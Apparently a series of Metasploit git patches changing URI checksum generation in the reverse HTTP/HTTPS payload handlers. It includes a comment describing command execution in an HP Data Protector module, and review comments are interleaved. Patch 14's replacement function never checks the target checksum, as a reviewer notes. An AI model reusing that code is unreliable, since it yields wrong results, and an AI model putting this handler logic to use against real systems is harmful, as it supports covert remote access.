From: Tod Beardsley Date: Mon, 26 Mar 2012 10:41:50 -0500 Subject: [PATCH 12/46] Rogue period, DELETED. --- modules/auxiliary/admin/hp/hp_data_protector_cmd.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/admin/hp/hp_data_protector_cmd.rb b/modules/auxiliary/admin/hp/hp_data_protector_cmd.rb index 9dd65c6a71..406d13205c 100644 --- a/modules/auxiliary/admin/hp/hp_data_protector_cmd.rb +++ b/modules/auxiliary/admin/hp/hp_data_protector_cmd.rb @@ -20,7 +20,7 @@ class Metasploit3 < Msf::Auxiliary When an EXEC_CMD packet is sent, omniinet.exe will attempt to look for that user-supplied filename with kernel32!FindFirstFileW(). If the file - is found, the process will then go ahead execute it with CreateProcess(). + is found, the process will then go ahead execute it with CreateProcess() under a new thread. If the filename isn't found, FindFirstFileW() will throw an error (0x03), and then bails early without triggering CreateProcess(). From 7161a548f4259032f5cef8d97f38915aaa6344db Mon Sep 17 00:00:00 2001 From: hdm Date: Mon, 26 Mar 2012 11:49:51 -0500 Subject: [PATCH 13/46] Precalculate some uri strings in case the 1000-round generation fails --- lib/msf/core/handler/reverse_http.rb | 15 ++++++++++++--- lib/msf/core/handler/reverse_https.rb | 13 +++++++++++-- 2 files changed, 23 insertions(+), 5 deletions(-) diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb index dc241353cc..fe1a7d78a9 100644 --- a/lib/msf/core/handler/reverse_http.rb +++ b/lib/msf/core/handler/reverse_http.rb 
@@ -36,7 +36,12 @@ module ReverseHttp URI_CHECKSUM_INITW = 92 URI_CHECKSUM_INITJ = 88 URI_CHECKSUM_CONN = 98 - + + # + # Precalculated checkums as fallback + # + URI_CHECKSUM_PRECALC = ["Zjjaq", "pIlfv", "UvoxP", "sqnx9", "zvoVO", "Pajqy", "7ziuw", "vecYp", "yfHsn", "YLzzp", "cEzvr", "abmri", "9tvwr", "vTarp", "ocrgc", "mZcyl", "xfcje", "nihqa", "40F17", "zzTWt", "E3192", "wygVh", "pbqij", "rxdVs", "ajtsf", "wvuOh", "hwRwr", "pUots", "rvzoK", "vUwby", "tLzyk", "zxbuV", "niaoy", "ukxtU", "vznoU", "zuxyC", "ymvag", "Jxtxw", "404KC", "DE563", "0A7G9", "yorYv", "zzuqP", "czhwo", "949N8", "a1560", "5A2S3", "Q652A", "KR201", "uixtg", "U0K02", "4EO56", "H88H4", "5M8E6", "zudkx", "ywlsh", "luqmy", "09S4I", "L0GG0", "V916E", "KFI11", "A4BN8", "C3E2Q", "UN804", "E75HG", "622eB", "1OZ71", "kynyx", "0RE7F", "F8CR2", "1Q2EM", "txzjw", "5KD1S", "GLR40", "11BbD", "MR8B2", "X4V55", "W994P", "13d2T", "6J4AZ", "HD2EM", "766bL", "8S4MF", "MBX39", "UJI57", "eIA51", "9CZN2", "WH6AA", "a6BF9", "8B1Gg", "J2N6Z", "144Kw", "7E37v", "9I7RR", "PE6MF", "K0c4M", "LR3IF", "38p3S", "39ab3", "O0dO1", "k8H8A", "0Fz3B", "o1PE1", "h7OI0", "C1COb", "bMC6A", "8fU4C", "3IMSO", "8DbFH", "2YfG5", "bEQ1E", "MU6NI", "UCENE", "WBc0E", "T1ATX", "tBL0A", "UGPV2", "j3CLI", "7FXp1", "yN07I", "YE6k9", "KTMHE", "a7VBJ", "0Uq3R", "70Ebn", "H2PqB", "83edJ", "0w5q2", "72djI", "wA5CQ", "KF0Ix", "i7AZH", "M9tU5", "Hs3RE", "F9m1i", "7ecBF", "zS31W", "lUe21", "IvCS5", "j97nC", "CNtR5", "1g8gV", "7KwNG", "DB7hj", "ORFr7", "GCnUD", "K58jp", "5lKo8", "GPIdP", "oMIFJ", "2xYb1", "LQQPY", "FGQlN", "l5COf", "dA3Tn", "v9RWC", "VuAGI", "3vIr9", "aO3zA", "CIfx5", "Gk6Uc", "pxL94", "rKYJB", "TXAFp", "XEOGq", "aBOiJ", "qp6EJ", "YGbq4", "dR8Rh", "g0SVi", "iMr6L", "HMaIl", "yOY1Z", "UXr5Y", "PJdz6", "OQdt7", "EmZ1s", "aLIVe", "cIeo2", "mTTNP", "eVKy5", "hf5Co", "gFHzG", "VhTWN", "DvAWf", "RgFJp", "MoaXE", "Mrq4W", "hRQAp", "hAzYA", "oOSWV", "UKMme", "oP0Zw", "Mxd6b", "RsRCh", "dlk7Q", "YU6zf", "VPDjq", "ygERO", "dZZcL", "dq5qM", 
"LITku", "AZIxn", "bVwPL", "jGvZK", "XayKP", "rTYVY", "Vo2ph", "dwJYR", "rLTlS", "BmsfJ", "Dyv1o", "j9Hvs", "w0wVa", "iDnBy", "uKEgk", "uosI8", "2yjuO", "HiOue", "qYi4t", "7nalj", "ENekz", "rxca0", "rrePF", "cXmtD", "Xlr2y", "S7uxk", "wJqaP", "KmYyZ", "cPryG", "kYcwH", "FtDut", "xm1em", "IaymY", "fr6ew", "ixDSs", "YigPs", "PqwBs", "y2rkf", "vwaTM", "aq7wp", "fzc4z", "AyzmQ", "epJbr", "culLd", "CVtnz", "tPjPx", "nfry8", "Nkpif", "8kuzg", "zXvz8", "oVQly", "1vpnw", "jqaYh", "2tztj", "4tslx"] + # # Map "random" URIs to static strings, allowing us to randomize # the URI sent in the first request. @@ -65,11 +70,15 @@ module ReverseHttp # Create a URI that matches a given checksum # def generate_uri_checksum(sum) + + # Spend up to 1000 rounds to generate a random URI 0.upto(1000) do - uri = Rex::Text.rand_text_alphanumeric(4) + uri = Rex::Text.rand_text_alphanumeric(5) return uri if Rex::Text.checksum8(uri) == sum end - raise RuntimeError, "Unable to generate a string with checksum #{sum}" + + # Otherwise return one of the pre-calculated strings + return URI_CHECKSUM_PRECALC[sum] end # diff --git a/lib/msf/core/handler/reverse_https.rb b/lib/msf/core/handler/reverse_https.rb index a8148a88f3..dd697713c3 100644 --- a/lib/msf/core/handler/reverse_https.rb +++ b/lib/msf/core/handler/reverse_https.rb 
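Review bot: In reverse_http.rb's `generate_uri_checksum`, the fallback `return URI_CHECKSUM_PRECALC[sum]` replaces the old `raise RuntimeError`, so a `sum` with no entry in the table now yields nil for the caller to trip over later; nothing in the hunk checks that the table covers every value `checksum8` can produce or that entry `i` really has checksum `i`. `URI_CHECKSUM_PRECALC.fetch(sum)` keeps the failure loud, and a one-line comment stating the table's invariant (index equals the entry's `checksum8`) would let the next maintainer verify it. The same table and method body are pasted again into reverse_https.rb in the following hunks, so the constant belongs in one shared place and should be `.freeze`d.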
@@ -37,6 +37,11 @@ module ReverseHttps URI_CHECKSUM_INITJ = 88 URI_CHECKSUM_CONN = 98 + # + # Precalculated checkums as fallback + # + URI_CHECKSUM_PRECALC = ["Zjjaq", "pIlfv", "UvoxP", "sqnx9", "zvoVO", "Pajqy", "7ziuw", "vecYp", "yfHsn", "YLzzp", "cEzvr", "abmri", "9tvwr", "vTarp", "ocrgc", "mZcyl", "xfcje", "nihqa", "40F17", "zzTWt", "E3192", "wygVh", "pbqij", "rxdVs", "ajtsf", "wvuOh", "hwRwr", "pUots", "rvzoK", "vUwby", "tLzyk", "zxbuV", "niaoy", "ukxtU", "vznoU", "zuxyC", "ymvag", "Jxtxw", "404KC", "DE563", "0A7G9", "yorYv", "zzuqP", "czhwo", "949N8", "a1560", "5A2S3", "Q652A", "KR201", "uixtg", "U0K02", "4EO56", "H88H4", "5M8E6", "zudkx", "ywlsh", "luqmy", "09S4I", "L0GG0", "V916E", "KFI11", "A4BN8", "C3E2Q", "UN804", "E75HG", "622eB", "1OZ71", "kynyx", "0RE7F", "F8CR2", "1Q2EM", "txzjw", "5KD1S", "GLR40", "11BbD", "MR8B2", "X4V55", "W994P", "13d2T", "6J4AZ", "HD2EM", "766bL", "8S4MF", "MBX39", "UJI57", "eIA51", "9CZN2", "WH6AA", "a6BF9", "8B1Gg", "J2N6Z", "144Kw", "7E37v", "9I7RR", "PE6MF", "K0c4M", "LR3IF", "38p3S", "39ab3", "O0dO1", "k8H8A", "0Fz3B", "o1PE1", "h7OI0", "C1COb", "bMC6A", "8fU4C", "3IMSO", "8DbFH", "2YfG5", "bEQ1E", "MU6NI", "UCENE", "WBc0E", "T1ATX", "tBL0A", "UGPV2", "j3CLI", "7FXp1", "yN07I", "YE6k9", "KTMHE", "a7VBJ", "0Uq3R", "70Ebn", "H2PqB", "83edJ", "0w5q2", "72djI", "wA5CQ", "KF0Ix", "i7AZH", "M9tU5", "Hs3RE", "F9m1i", "7ecBF", "zS31W", "lUe21", "IvCS5", "j97nC", "CNtR5", "1g8gV", "7KwNG", "DB7hj", "ORFr7", "GCnUD", "K58jp", "5lKo8", "GPIdP", "oMIFJ", "2xYb1", "LQQPY", "FGQlN", "l5COf", "dA3Tn", "v9RWC", "VuAGI", "3vIr9", "aO3zA", "CIfx5", "Gk6Uc", "pxL94", "rKYJB", "TXAFp", "XEOGq", "aBOiJ", "qp6EJ", "YGbq4", "dR8Rh", "g0SVi", "iMr6L", "HMaIl", "yOY1Z", "UXr5Y", "PJdz6", "OQdt7", "EmZ1s", "aLIVe", "cIeo2", "mTTNP", "eVKy5", "hf5Co", "gFHzG", "VhTWN", "DvAWf", "RgFJp", "MoaXE", "Mrq4W", "hRQAp", "hAzYA", "oOSWV", "UKMme", "oP0Zw", "Mxd6b", "RsRCh", "dlk7Q", "YU6zf", "VPDjq", "ygERO", "dZZcL", "dq5qM", "LITku", "AZIxn", "bVwPL", 
"jGvZK", "XayKP", "rTYVY", "Vo2ph", "dwJYR", "rLTlS", "BmsfJ", "Dyv1o", "j9Hvs", "w0wVa", "iDnBy", "uKEgk", "uosI8", "2yjuO", "HiOue", "qYi4t", "7nalj", "ENekz", "rxca0", "rrePF", "cXmtD", "Xlr2y", "S7uxk", "wJqaP", "KmYyZ", "cPryG", "kYcwH", "FtDut", "xm1em", "IaymY", "fr6ew", "ixDSs", "YigPs", "PqwBs", "y2rkf", "vwaTM", "aq7wp", "fzc4z", "AyzmQ", "epJbr", "culLd", "CVtnz", "tPjPx", "nfry8", "Nkpif", "8kuzg", "zXvz8", "oVQly", "1vpnw", "jqaYh", "2tztj", "4tslx"] + # # Map "random" URIs to static strings, allowing us to randomize # the URI sent in the first request. @@ -66,11 +71,15 @@ module ReverseHttps # Create a URI that matches a given checksum # def generate_uri_checksum(sum) + + # Spend up to 1000 rounds to generate a random URI 0.upto(1000) do - uri = Rex::Text.rand_text_alphanumeric(4) + uri = Rex::Text.rand_text_alphanumeric(5) return uri if Rex::Text.checksum8(uri) == sum end - raise RuntimeError, "Unable to generate a string with checksum #{sum}" + + # Otherwise return one of the pre-calculated strings + return URI_CHECKSUM_PRECALC[sum] end # From 9fad028d8a260eeb1befe2b325636a92be53434d Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 26 Mar 2012 11:59:29 -0500 Subject: [PATCH 14/46] A nicer checksum fixer Just use a checksum digit like a cc#, no need for precalculated lists, will be correct every time. --- lib/msf/core/handler/reverse_https.rb | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) diff --git a/lib/msf/core/handler/reverse_https.rb b/lib/msf/core/handler/reverse_https.rb index a8148a88f3..0867ef01dc 100644 --- a/lib/msf/core/handler/reverse_https.rb +++ b/lib/msf/core/handler/reverse_https.rb 
@@ -61,18 +61,21 @@ module ReverseHttps uri_match end - + # # Create a URI that matches a given checksum # def generate_uri_checksum(sum) - 0.upto(1000) do - uri = Rex::Text.rand_text_alphanumeric(4) - return uri if Rex::Text.checksum8(uri) == sum + urix = nil + uri = Rex::Text.rand_text_alphanumeric(3) + ("a".."z").sort_by {rand}.each do |x| + urix = (uri + x) if Rex::Text.checksum8(uri + x) + break if urix end + return urix if urix raise RuntimeError, "Unable to generate a string with checksum #{sum}" end - + # # Initializes the HTTP SSL tunneling handler. # From 93244f2dc88038774f650315c42492977a18a2f4 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 26 Mar 2012 12:22:19 -0500 Subject: [PATCH 15/46] Revert "Precalculate some uri strings in case the 1000-round generation fails" This reverts commit 7161a548f4259032f5cef8d97f38915aaa6344db. Prepping for a more sane solution that doesn't change the URI sizes and succeeds without fallingback to a pre-generated list. --- lib/msf/core/handler/reverse_http.rb | 15 +++------------ lib/msf/core/handler/reverse_https.rb | 13 ++----------- 2 files changed, 5 insertions(+), 23 deletions(-) diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb index fe1a7d78a9..dc241353cc 100644 --- a/lib/msf/core/handler/reverse_http.rb +++ b/lib/msf/core/handler/reverse_http.rb 
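Review bot: The condition in `urix = (uri + x) if Rex::Text.checksum8(uri + x)` never compares the result with `sum`. Assuming checksum8 returns an Integer, as the `== sum` comparison on the removed lines implies, it is always truthy in Ruby, so the first shuffled letter is accepted and the returned string carries an arbitrary checksum. The test should read `if Rex::Text.checksum8(uri + x) == sum`. Even with that fix, one trailing letter from `"a".."z"` covers at most 26 checksum values for a given 3-character prefix, so the `raise` would be reached often unless the prefix is re-drawn in an outer loop; the commit message's "will be correct every time" does not hold as written. The same missing comparison is in both generate_uri_checksum hunks of PATCH 18/46 (reverse_http.rb and reverse_https.rb).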
@@ -36,12 +36,7 @@ module ReverseHttp URI_CHECKSUM_INITW = 92 URI_CHECKSUM_INITJ = 88 URI_CHECKSUM_CONN = 98 - - # - # Precalculated checkums as fallback - # - URI_CHECKSUM_PRECALC = ["Zjjaq", "pIlfv", "UvoxP", "sqnx9", "zvoVO", "Pajqy", "7ziuw", "vecYp", "yfHsn", "YLzzp", "cEzvr", "abmri", "9tvwr", "vTarp", "ocrgc", "mZcyl", "xfcje", "nihqa", "40F17", "zzTWt", "E3192", "wygVh", "pbqij", "rxdVs", "ajtsf", "wvuOh", "hwRwr", "pUots", "rvzoK", "vUwby", "tLzyk", "zxbuV", "niaoy", "ukxtU", "vznoU", "zuxyC", "ymvag", "Jxtxw", "404KC", "DE563", "0A7G9", "yorYv", "zzuqP", "czhwo", "949N8", "a1560", "5A2S3", "Q652A", "KR201", "uixtg", "U0K02", "4EO56", "H88H4", "5M8E6", "zudkx", "ywlsh", "luqmy", "09S4I", "L0GG0", "V916E", "KFI11", "A4BN8", "C3E2Q", "UN804", "E75HG", "622eB", "1OZ71", "kynyx", "0RE7F", "F8CR2", "1Q2EM", "txzjw", "5KD1S", "GLR40", "11BbD", "MR8B2", "X4V55", "W994P", "13d2T", "6J4AZ", "HD2EM", "766bL", "8S4MF", "MBX39", "UJI57", "eIA51", "9CZN2", "WH6AA", "a6BF9", "8B1Gg", "J2N6Z", "144Kw", "7E37v", "9I7RR", "PE6MF", "K0c4M", "LR3IF", "38p3S", "39ab3", "O0dO1", "k8H8A", "0Fz3B", "o1PE1", "h7OI0", "C1COb", "bMC6A", "8fU4C", "3IMSO", "8DbFH", "2YfG5", "bEQ1E", "MU6NI", "UCENE", "WBc0E", "T1ATX", "tBL0A", "UGPV2", "j3CLI", "7FXp1", "yN07I", "YE6k9", "KTMHE", "a7VBJ", "0Uq3R", "70Ebn", "H2PqB", "83edJ", "0w5q2", "72djI", "wA5CQ", "KF0Ix", "i7AZH", "M9tU5", "Hs3RE", "F9m1i", "7ecBF", "zS31W", "lUe21", "IvCS5", "j97nC", "CNtR5", "1g8gV", "7KwNG", "DB7hj", "ORFr7", "GCnUD", "K58jp", "5lKo8", "GPIdP", "oMIFJ", "2xYb1", "LQQPY", "FGQlN", "l5COf", "dA3Tn", "v9RWC", "VuAGI", "3vIr9", "aO3zA", "CIfx5", "Gk6Uc", "pxL94", "rKYJB", "TXAFp", "XEOGq", "aBOiJ", "qp6EJ", "YGbq4", "dR8Rh", "g0SVi", "iMr6L", "HMaIl", "yOY1Z", "UXr5Y", "PJdz6", "OQdt7", "EmZ1s", "aLIVe", "cIeo2", "mTTNP", "eVKy5", "hf5Co", "gFHzG", "VhTWN", "DvAWf", "RgFJp", "MoaXE", "Mrq4W", "hRQAp", "hAzYA", "oOSWV", "UKMme", "oP0Zw", "Mxd6b", "RsRCh", "dlk7Q", "YU6zf", "VPDjq", "ygERO", "dZZcL", "dq5qM", 
"LITku", "AZIxn", "bVwPL", "jGvZK", "XayKP", "rTYVY", "Vo2ph", "dwJYR", "rLTlS", "BmsfJ", "Dyv1o", "j9Hvs", "w0wVa", "iDnBy", "uKEgk", "uosI8", "2yjuO", "HiOue", "qYi4t", "7nalj", "ENekz", "rxca0", "rrePF", "cXmtD", "Xlr2y", "S7uxk", "wJqaP", "KmYyZ", "cPryG", "kYcwH", "FtDut", "xm1em", "IaymY", "fr6ew", "ixDSs", "YigPs", "PqwBs", "y2rkf", "vwaTM", "aq7wp", "fzc4z", "AyzmQ", "epJbr", "culLd", "CVtnz", "tPjPx", "nfry8", "Nkpif", "8kuzg", "zXvz8", "oVQly", "1vpnw", "jqaYh", "2tztj", "4tslx"] - + # # Map "random" URIs to static strings, allowing us to randomize # the URI sent in the first request. @@ -70,15 +65,11 @@ module ReverseHttp # Create a URI that matches a given checksum # def generate_uri_checksum(sum) - - # Spend up to 1000 rounds to generate a random URI 0.upto(1000) do - uri = Rex::Text.rand_text_alphanumeric(5) + uri = Rex::Text.rand_text_alphanumeric(4) return uri if Rex::Text.checksum8(uri) == sum end - - # Otherwise return one of the pre-calculated strings - return URI_CHECKSUM_PRECALC[sum] + raise RuntimeError, "Unable to generate a string with checksum #{sum}" end # diff --git a/lib/msf/core/handler/reverse_https.rb b/lib/msf/core/handler/reverse_https.rb index dd697713c3..a8148a88f3 100644 --- a/lib/msf/core/handler/reverse_https.rb +++ b/lib/msf/core/handler/reverse_https.rb 
@@ -37,11 +37,6 @@ module ReverseHttps URI_CHECKSUM_INITJ = 88 URI_CHECKSUM_CONN = 98 - # - # Precalculated checkums as fallback - # - URI_CHECKSUM_PRECALC = ["Zjjaq", "pIlfv", "UvoxP", "sqnx9", "zvoVO", "Pajqy", "7ziuw", "vecYp", "yfHsn", "YLzzp", "cEzvr", "abmri", "9tvwr", "vTarp", "ocrgc", "mZcyl", "xfcje", "nihqa", "40F17", "zzTWt", "E3192", "wygVh", "pbqij", "rxdVs", "ajtsf", "wvuOh", "hwRwr", "pUots", "rvzoK", "vUwby", "tLzyk", "zxbuV", "niaoy", "ukxtU", "vznoU", "zuxyC", "ymvag", "Jxtxw", "404KC", "DE563", "0A7G9", "yorYv", "zzuqP", "czhwo", "949N8", "a1560", "5A2S3", "Q652A", "KR201", "uixtg", "U0K02", "4EO56", "H88H4", "5M8E6", "zudkx", "ywlsh", "luqmy", "09S4I", "L0GG0", "V916E", "KFI11", "A4BN8", "C3E2Q", "UN804", "E75HG", "622eB", "1OZ71", "kynyx", "0RE7F", "F8CR2", "1Q2EM", "txzjw", "5KD1S", "GLR40", "11BbD", "MR8B2", "X4V55", "W994P", "13d2T", "6J4AZ", "HD2EM", "766bL", "8S4MF", "MBX39", "UJI57", "eIA51", "9CZN2", "WH6AA", "a6BF9", "8B1Gg", "J2N6Z", "144Kw", "7E37v", "9I7RR", "PE6MF", "K0c4M", "LR3IF", "38p3S", "39ab3", "O0dO1", "k8H8A", "0Fz3B", "o1PE1", "h7OI0", "C1COb", "bMC6A", "8fU4C", "3IMSO", "8DbFH", "2YfG5", "bEQ1E", "MU6NI", "UCENE", "WBc0E", "T1ATX", "tBL0A", "UGPV2", "j3CLI", "7FXp1", "yN07I", "YE6k9", "KTMHE", "a7VBJ", "0Uq3R", "70Ebn", "H2PqB", "83edJ", "0w5q2", "72djI", "wA5CQ", "KF0Ix", "i7AZH", "M9tU5", "Hs3RE", "F9m1i", "7ecBF", "zS31W", "lUe21", "IvCS5", "j97nC", "CNtR5", "1g8gV", "7KwNG", "DB7hj", "ORFr7", "GCnUD", "K58jp", "5lKo8", "GPIdP", "oMIFJ", "2xYb1", "LQQPY", "FGQlN", "l5COf", "dA3Tn", "v9RWC", "VuAGI", "3vIr9", "aO3zA", "CIfx5", "Gk6Uc", "pxL94", "rKYJB", "TXAFp", "XEOGq", "aBOiJ", "qp6EJ", "YGbq4", "dR8Rh", "g0SVi", "iMr6L", "HMaIl", "yOY1Z", "UXr5Y", "PJdz6", "OQdt7", "EmZ1s", "aLIVe", "cIeo2", "mTTNP", "eVKy5", "hf5Co", "gFHzG", "VhTWN", "DvAWf", "RgFJp", "MoaXE", "Mrq4W", "hRQAp", "hAzYA", "oOSWV", "UKMme", "oP0Zw", "Mxd6b", "RsRCh", "dlk7Q", "YU6zf", "VPDjq", "ygERO", "dZZcL", "dq5qM", "LITku", "AZIxn", "bVwPL", 
"jGvZK", "XayKP", "rTYVY", "Vo2ph", "dwJYR", "rLTlS", "BmsfJ", "Dyv1o", "j9Hvs", "w0wVa", "iDnBy", "uKEgk", "uosI8", "2yjuO", "HiOue", "qYi4t", "7nalj", "ENekz", "rxca0", "rrePF", "cXmtD", "Xlr2y", "S7uxk", "wJqaP", "KmYyZ", "cPryG", "kYcwH", "FtDut", "xm1em", "IaymY", "fr6ew", "ixDSs", "YigPs", "PqwBs", "y2rkf", "vwaTM", "aq7wp", "fzc4z", "AyzmQ", "epJbr", "culLd", "CVtnz", "tPjPx", "nfry8", "Nkpif", "8kuzg", "zXvz8", "oVQly", "1vpnw", "jqaYh", "2tztj", "4tslx"] - # # Map "random" URIs to static strings, allowing us to randomize # the URI sent in the first request. @@ -71,15 +66,11 @@ module ReverseHttps # Create a URI that matches a given checksum # def generate_uri_checksum(sum) - - # Spend up to 1000 rounds to generate a random URI 0.upto(1000) do - uri = Rex::Text.rand_text_alphanumeric(5) + uri = Rex::Text.rand_text_alphanumeric(4) return uri if Rex::Text.checksum8(uri) == sum end - - # Otherwise return one of the pre-calculated strings - return URI_CHECKSUM_PRECALC[sum] + raise RuntimeError, "Unable to generate a string with checksum #{sum}" end # From 27d3f490f76e9fa2d603960c635effb62e731606 Mon Sep 17 00:00:00 2001 From: hdm Date: Mon, 26 Mar 2012 11:49:51 -0500 Subject: [PATCH 16/46] Precalculate some uri strings in case the 1000-round generation fails --- lib/msf/core/handler/reverse_http.rb | 15 ++++++++++++--- lib/msf/core/handler/reverse_https.rb | 5 +++++ 2 files changed, 17 insertions(+), 3 deletions(-) diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb index dc241353cc..fe1a7d78a9 100644 --- a/lib/msf/core/handler/reverse_http.rb +++ b/lib/msf/core/handler/reverse_http.rb 
@@ -36,7 +36,12 @@ module ReverseHttp URI_CHECKSUM_INITW = 92 URI_CHECKSUM_INITJ = 88 URI_CHECKSUM_CONN = 98 - + + # + # Precalculated checkums as fallback + # + URI_CHECKSUM_PRECALC = ["Zjjaq", "pIlfv", "UvoxP", "sqnx9", "zvoVO", "Pajqy", "7ziuw", "vecYp", "yfHsn", "YLzzp", "cEzvr", "abmri", "9tvwr", "vTarp", "ocrgc", "mZcyl", "xfcje", "nihqa", "40F17", "zzTWt", "E3192", "wygVh", "pbqij", "rxdVs", "ajtsf", "wvuOh", "hwRwr", "pUots", "rvzoK", "vUwby", "tLzyk", "zxbuV", "niaoy", "ukxtU", "vznoU", "zuxyC", "ymvag", "Jxtxw", "404KC", "DE563", "0A7G9", "yorYv", "zzuqP", "czhwo", "949N8", "a1560", "5A2S3", "Q652A", "KR201", "uixtg", "U0K02", "4EO56", "H88H4", "5M8E6", "zudkx", "ywlsh", "luqmy", "09S4I", "L0GG0", "V916E", "KFI11", "A4BN8", "C3E2Q", "UN804", "E75HG", "622eB", "1OZ71", "kynyx", "0RE7F", "F8CR2", "1Q2EM", "txzjw", "5KD1S", "GLR40", "11BbD", "MR8B2", "X4V55", "W994P", "13d2T", "6J4AZ", "HD2EM", "766bL", "8S4MF", "MBX39", "UJI57", "eIA51", "9CZN2", "WH6AA", "a6BF9", "8B1Gg", "J2N6Z", "144Kw", "7E37v", "9I7RR", "PE6MF", "K0c4M", "LR3IF", "38p3S", "39ab3", "O0dO1", "k8H8A", "0Fz3B", "o1PE1", "h7OI0", "C1COb", "bMC6A", "8fU4C", "3IMSO", "8DbFH", "2YfG5", "bEQ1E", "MU6NI", "UCENE", "WBc0E", "T1ATX", "tBL0A", "UGPV2", "j3CLI", "7FXp1", "yN07I", "YE6k9", "KTMHE", "a7VBJ", "0Uq3R", "70Ebn", "H2PqB", "83edJ", "0w5q2", "72djI", "wA5CQ", "KF0Ix", "i7AZH", "M9tU5", "Hs3RE", "F9m1i", "7ecBF", "zS31W", "lUe21", "IvCS5", "j97nC", "CNtR5", "1g8gV", "7KwNG", "DB7hj", "ORFr7", "GCnUD", "K58jp", "5lKo8", "GPIdP", "oMIFJ", "2xYb1", "LQQPY", "FGQlN", "l5COf", "dA3Tn", "v9RWC", "VuAGI", "3vIr9", "aO3zA", "CIfx5", "Gk6Uc", "pxL94", "rKYJB", "TXAFp", "XEOGq", "aBOiJ", "qp6EJ", "YGbq4", "dR8Rh", "g0SVi", "iMr6L", "HMaIl", "yOY1Z", "UXr5Y", "PJdz6", "OQdt7", "EmZ1s", "aLIVe", "cIeo2", "mTTNP", "eVKy5", "hf5Co", "gFHzG", "VhTWN", "DvAWf", "RgFJp", "MoaXE", "Mrq4W", "hRQAp", "hAzYA", "oOSWV", "UKMme", "oP0Zw", "Mxd6b", "RsRCh", "dlk7Q", "YU6zf", "VPDjq", "ygERO", "dZZcL", "dq5qM", 
"LITku", "AZIxn", "bVwPL", "jGvZK", "XayKP", "rTYVY", "Vo2ph", "dwJYR", "rLTlS", "BmsfJ", "Dyv1o", "j9Hvs", "w0wVa", "iDnBy", "uKEgk", "uosI8", "2yjuO", "HiOue", "qYi4t", "7nalj", "ENekz", "rxca0", "rrePF", "cXmtD", "Xlr2y", "S7uxk", "wJqaP", "KmYyZ", "cPryG", "kYcwH", "FtDut", "xm1em", "IaymY", "fr6ew", "ixDSs", "YigPs", "PqwBs", "y2rkf", "vwaTM", "aq7wp", "fzc4z", "AyzmQ", "epJbr", "culLd", "CVtnz", "tPjPx", "nfry8", "Nkpif", "8kuzg", "zXvz8", "oVQly", "1vpnw", "jqaYh", "2tztj", "4tslx"] + # # Map "random" URIs to static strings, allowing us to randomize # the URI sent in the first request. @@ -65,11 +70,15 @@ module ReverseHttp # Create a URI that matches a given checksum # def generate_uri_checksum(sum) + + # Spend up to 1000 rounds to generate a random URI 0.upto(1000) do - uri = Rex::Text.rand_text_alphanumeric(4) + uri = Rex::Text.rand_text_alphanumeric(5) return uri if Rex::Text.checksum8(uri) == sum end - raise RuntimeError, "Unable to generate a string with checksum #{sum}" + + # Otherwise return one of the pre-calculated strings + return URI_CHECKSUM_PRECALC[sum] end # diff --git a/lib/msf/core/handler/reverse_https.rb b/lib/msf/core/handler/reverse_https.rb index 0867ef01dc..b873a279d3 100644 --- a/lib/msf/core/handler/reverse_https.rb +++ b/lib/msf/core/handler/reverse_https.rb 
@@ -37,6 +37,11 @@ module ReverseHttps URI_CHECKSUM_INITJ = 88 URI_CHECKSUM_CONN = 98 + # + # Precalculated checkums as fallback + # + URI_CHECKSUM_PRECALC = ["Zjjaq", "pIlfv", "UvoxP", "sqnx9", "zvoVO", "Pajqy", "7ziuw", "vecYp", "yfHsn", "YLzzp", "cEzvr", "abmri", "9tvwr", "vTarp", "ocrgc", "mZcyl", "xfcje", "nihqa", "40F17", "zzTWt", "E3192", "wygVh", "pbqij", "rxdVs", "ajtsf", "wvuOh", "hwRwr", "pUots", "rvzoK", "vUwby", "tLzyk", "zxbuV", "niaoy", "ukxtU", "vznoU", "zuxyC", "ymvag", "Jxtxw", "404KC", "DE563", "0A7G9", "yorYv", "zzuqP", "czhwo", "949N8", "a1560", "5A2S3", "Q652A", "KR201", "uixtg", "U0K02", "4EO56", "H88H4", "5M8E6", "zudkx", "ywlsh", "luqmy", "09S4I", "L0GG0", "V916E", "KFI11", "A4BN8", "C3E2Q", "UN804", "E75HG", "622eB", "1OZ71", "kynyx", "0RE7F", "F8CR2", "1Q2EM", "txzjw", "5KD1S", "GLR40", "11BbD", "MR8B2", "X4V55", "W994P", "13d2T", "6J4AZ", "HD2EM", "766bL", "8S4MF", "MBX39", "UJI57", "eIA51", "9CZN2", "WH6AA", "a6BF9", "8B1Gg", "J2N6Z", "144Kw", "7E37v", "9I7RR", "PE6MF", "K0c4M", "LR3IF", "38p3S", "39ab3", "O0dO1", "k8H8A", "0Fz3B", "o1PE1", "h7OI0", "C1COb", "bMC6A", "8fU4C", "3IMSO", "8DbFH", "2YfG5", "bEQ1E", "MU6NI", "UCENE", "WBc0E", "T1ATX", "tBL0A", "UGPV2", "j3CLI", "7FXp1", "yN07I", "YE6k9", "KTMHE", "a7VBJ", "0Uq3R", "70Ebn", "H2PqB", "83edJ", "0w5q2", "72djI", "wA5CQ", "KF0Ix", "i7AZH", "M9tU5", "Hs3RE", "F9m1i", "7ecBF", "zS31W", "lUe21", "IvCS5", "j97nC", "CNtR5", "1g8gV", "7KwNG", "DB7hj", "ORFr7", "GCnUD", "K58jp", "5lKo8", "GPIdP", "oMIFJ", "2xYb1", "LQQPY", "FGQlN", "l5COf", "dA3Tn", "v9RWC", "VuAGI", "3vIr9", "aO3zA", "CIfx5", "Gk6Uc", "pxL94", "rKYJB", "TXAFp", "XEOGq", "aBOiJ", "qp6EJ", "YGbq4", "dR8Rh", "g0SVi", "iMr6L", "HMaIl", "yOY1Z", "UXr5Y", "PJdz6", "OQdt7", "EmZ1s", "aLIVe", "cIeo2", "mTTNP", "eVKy5", "hf5Co", "gFHzG", "VhTWN", "DvAWf", "RgFJp", "MoaXE", "Mrq4W", "hRQAp", "hAzYA", "oOSWV", "UKMme", "oP0Zw", "Mxd6b", "RsRCh", "dlk7Q", "YU6zf", "VPDjq", "ygERO", "dZZcL", "dq5qM", "LITku", "AZIxn", "bVwPL", 
